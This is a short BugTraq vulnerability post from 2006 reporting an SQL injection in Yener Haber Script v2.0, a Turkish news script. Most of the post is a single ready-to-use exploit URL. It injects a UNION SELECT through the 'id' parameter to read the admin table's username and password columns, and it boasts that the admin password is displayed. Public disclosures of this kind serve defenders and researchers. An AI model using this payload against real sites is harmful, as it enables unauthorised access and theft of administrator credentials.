BugTraq
Yener Haber Script v2.0 SQL injection Oct 04 2006 10:16AM
dj_remix_20 hotmail com
# BiyoSecurity.Org

# script name : Yener Haber Script v2.0

# Demo : http://www50.brinkster.com/yenerturk

# Risk : High

# Regards : Dj_ReMix

# Thanks : Korsan , Liz0zim , TR_IP

# Exploit :

http://victim.com/?x=2&kategori=11&id=-1%20union+select+id,kullanici_adi
,sifre,4,5,6,7,8,9+from+admin

Admin Pass Displayed :=)

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus